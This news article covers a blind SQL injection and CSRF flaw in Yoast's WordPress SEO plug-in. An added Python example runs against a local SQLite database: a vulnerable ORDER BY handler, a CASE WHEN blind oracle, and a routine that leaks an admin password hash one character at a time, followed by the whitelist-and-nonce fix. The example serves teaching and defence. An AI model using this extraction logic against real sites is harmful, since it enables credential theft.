Plug-in has tens of thousands of daily downloads

Mar 12, 2015 17:45 GMT

Some versions of Yoast's WordPress SEO plug-in are vulnerable to blind SQL injection because request parameters handled by its bulk editor were not properly sanitized before being used in SQL queries, a security researcher has found.

The injectable request has to be issued by an authenticated user, but because the affected requests carried no anti-CSRF (cross-site request forgery) protection, the attacker does not need an account of their own: a logged-in user who is lured into loading a crafted link submits the malicious query on the attacker's behalf.

The fix was delivered the day following the vulnerability report

The WordPress SEO plug-in is probably the most popular in its category, with over one million active installs according to its download page. At more than 16.5 million total downloads, it is among the most downloaded WordPress plug-ins.

As its name suggests, it is an SEO (search engine optimization) tool used on WordPress websites to improve their visibility in search results.

Security researcher Ryan Dewhurst, developer of the WPScan vulnerability scanner for WordPress, discovered the flaw in Yoast's SEO plug-in and reported it to the developer on Tuesday.

The following day, after assessing and confirming the issue, the developer corrected the flaws by releasing version 1.7.4 of the product.

Victim interaction is required for the exploit to function

In the changelog for this version, the vendor says that it “fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor.”

Exploiting the flaw requires an authenticated user to click a malicious link supplied by the attacker, which is not difficult to arrange with some social engineering.

The risk is complete compromise of the website: through the injection the attacker can read sensitive data out of the database, such as the table holding user log-in credentials.

Dewhurst created proof-of-concept exploit code for the vulnerability, consisting of an HTTP GET request which, when clicked by an authenticated admin, editor or author, causes the injected SQL query to run and the database to pause for ten seconds, the classic signal of a time-based blind SQL injection.
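The bug class described above, as an added example that is not code from the Yoast plug-in or from Dewhurst's proof of concept: an ORDER BY clause cannot take bound parameters, so a bulk-editor style "order_by"/"order" pair interpolated into the query is injectable, and the fix is to whitelist both values and to require a nonce on the request. The example uses Python with an in-memory SQLite database rather than PHP/MySQL; SQLite has no SLEEP(), so the blind oracle reads the answer from row ordering instead of from a delay. The table and column names, the sample password hash, the session id and the action name "wpseo-bulk-editor" are all constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed sample data for the demonstration; not taken from any real site.
# WordPress-like table shapes, trimmed to the columns the example needs.
SAMPLE_POSTS = [(1, "alpha", "2015-03-01"), (2, "bravo", "2015-03-02"), (3, "charlie", "2015-03-03")]
SAMPLE_USERS = [(1, "admin", "$P$BexampleHashValue")]  # constructed hash, not a real one


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE posts(ID INTEGER, post_title TEXT, post_date TEXT);"
        "CREATE TABLE users(ID INTEGER, user_login TEXT, user_pass TEXT);"
    )
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_posts_vulnerable(conn, order_by, order):
    """Vulnerable pattern: request parameters are interpolated straight into ORDER BY.
    ORDER BY cannot be parameterised, so this is exactly where a whitelist is required."""
    sql = f"SELECT ID FROM posts ORDER BY {order_by} {order}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_ORDER_BY = {"ID", "post_title", "post_date"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_posts_fixed(conn, order_by, order):
    """Hardened pattern: only whitelisted identifiers ever reach the query string."""
    if order_by not in ALLOWED_ORDER_BY:
        order_by = "post_title"
    order = order.upper()
    if order not in ALLOWED_ORDER:
        order = "ASC"
    sql = f"SELECT ID FROM posts ORDER BY {order_by} {order}"
    return [row[0] for row in conn.execute(sql)]


def blind_oracle(list_posts, conn, condition):
    """One yes/no question to the database, answered only through row ordering:
    true -> rows ascending by ID, false -> descending. The inverted query is asked
    as well, so a fixed default ordering cannot be mistaken for an answer."""
    payload = f"(CASE WHEN {condition} THEN ID ELSE -ID END)"
    inverse = f"(CASE WHEN {condition} THEN -ID ELSE ID END)"
    asc_ids = sorted(row[0] for row in SAMPLE_POSTS)
    return (list_posts(conn, payload, "ASC") == asc_ids
            and list_posts(conn, inverse, "ASC") == asc_ids[::-1])


def leak_password_hash(list_posts, conn, length):
    """Recover the first `length` characters of the admin's password hash one byte
    at a time; unicode() keeps quote characters out of the payload."""
    recovered = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):
            cond = f"(SELECT unicode(substr(user_pass, {pos}, 1)) FROM users WHERE ID = 1) = {code}"
            if blind_oracle(list_posts, conn, cond):
                recovered += chr(code)
                break
        else:
            break  # no candidate matched: the injection is not working, stop
    return recovered


# Constructed per-install secret; in WordPress this role is played by the salts in wp-config.php.
SERVER_SECRET = secrets.token_bytes(32)


def make_nonce(session_id, action):
    """Nonce bound to the user's session and to one action, in the spirit of wp_create_nonce()."""
    msg = f"{session_id}|{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def handle_bulk_editor_request(conn, session_id, params):
    """Fixed handler: a cross-site forged request cannot carry a valid nonce, and whatever
    it does carry for order_by/order is whitelisted before it touches the query."""
    expected = make_nonce(session_id, "wpseo-bulk-editor")  # action name is assumed
    if not hmac.compare_digest(params.get("_wpnonce", ""), expected):
        raise PermissionError("nonce check failed")
    return list_posts_fixed(conn, params.get("order_by", ""), params.get("order", ""))


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable handler:", leak_password_hash(list_posts_vulnerable, db, 4))
    print("leaked via fixed handler:     ", repr(leak_password_hash(list_posts_fixed, db, 4)))
```

Run stand-alone, the vulnerable handler gives up the first four characters of the stored hash purely from the order in which post IDs come back, while the whitelisted handler returns the same ordering for every payload and leaks nothing. The nonce check is the second half of the fix: without it, an attacker who cannot log in still gets the query executed by tricking a logged-in editor into following a link, which is the CSRF angle the article describes.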

Website administrators relying on Yoast's SEO component for WordPress are urged to update to the latest version as soon as possible.